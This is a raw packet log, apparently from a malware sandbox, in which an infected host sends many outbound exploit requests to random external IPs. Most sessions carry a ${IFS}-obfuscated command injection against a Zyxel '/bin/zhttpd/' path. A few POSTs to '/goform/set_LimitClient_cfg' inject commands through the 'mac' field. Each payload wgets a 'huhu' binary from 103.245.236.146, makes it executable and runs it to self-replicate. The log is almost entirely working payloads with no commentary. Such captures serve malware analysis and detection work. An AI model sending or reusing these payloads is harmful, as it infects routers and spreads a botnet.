                                                  Jan 19, 2024 18:24:16.479898930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9598192.168.2.1357688179.53.191.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479947090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9599192.168.2.1338652149.110.254.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479993105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9600192.168.2.1338434129.114.134.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480029106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9601192.168.2.1343952169.121.217.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480066061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9602192.168.2.13488889.113.226.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480110884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9603192.168.2.1355668186.49.157.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480156898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9604192.168.2.1351216164.186.178.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480180025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9605192.168.2.1347802115.3.201.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480216980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9606192.168.2.133750651.126.84.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480271101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9607192.168.2.135398641.172.55.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480300903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9608192.168.2.1346180140.130.77.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480351925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9609192.168.2.1354880145.3.175.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480407953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9610192.168.2.134066678.243.115.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480434895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9611192.168.2.1339096170.215.146.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480468988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9612192.168.2.1358560192.79.68.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480513096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9613192.168.2.1353922129.164.128.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480547905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9614192.168.2.13334269.124.117.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480593920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9615192.168.2.1348696218.88.249.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480614901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9616192.168.2.1348026154.240.165.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480679989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9617192.168.2.135319490.38.57.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480710030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9618192.168.2.1335154139.103.191.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480731010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9619192.168.2.1350104208.227.157.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480776072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9620192.168.2.133685650.84.196.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480803013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9621192.168.2.133841499.150.218.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480851889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9622192.168.2.1349354181.129.158.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480892897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9623192.168.2.1352486189.210.24.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480930090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9624192.168.2.134227857.202.59.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.480973959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9625192.168.2.135949275.27.133.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.481005907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9626192.168.2.135584057.228.42.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.481046915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9627192.168.2.1360924168.11.108.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.481097937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9628192.168.2.1354060150.92.243.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.481129885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9629192.168.2.1341252223.195.101.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.488575935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9630192.168.2.1357788161.19.146.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.488600969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9631192.168.2.1354730168.62.76.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.488643885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9632192.168.2.133849275.112.124.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.488677979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9633192.168.2.1351902105.216.155.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.488719940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9634192.168.2.134311289.225.52.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.488750935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9635192.168.2.1350742135.200.59.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.488807917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9636192.168.2.1349612201.42.211.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.488832951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9637192.168.2.13600688.139.129.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.488858938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9638192.168.2.1344296129.154.219.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.488890886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9639192.168.2.1349822101.109.211.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.488955975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9640192.168.2.1345320158.109.114.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489032030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9641192.168.2.136006451.61.151.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489032984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9642192.168.2.133832291.113.26.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489075899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9643192.168.2.1333656172.244.15.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489120960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9644192.168.2.134723694.72.82.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489166975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9645192.168.2.1335250180.201.69.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489213943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9646192.168.2.135049891.200.166.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489262104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9647192.168.2.1334378105.222.134.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489278078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9648192.168.2.1342268175.99.109.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489322901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9649192.168.2.134590472.160.182.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489363909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9650192.168.2.134877091.2.195.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489391088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9651192.168.2.134665482.0.188.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489419937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9652192.168.2.135121268.162.211.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.489860058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9653192.168.2.1354588175.29.219.698080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.911189079 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9654192.168.2.1335324175.239.27.2138080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:17.192575932 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:17.475328922 CET103INHTTP/1.1 404 Not Found
                                                  Content-Type: text/plain
                                                  Content-Length: 30
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9655192.168.2.1356654166.172.96.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:17.494641066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9656192.168.2.1344054154.29.202.80443
                                                  TimestampBytes transferredDirectionData
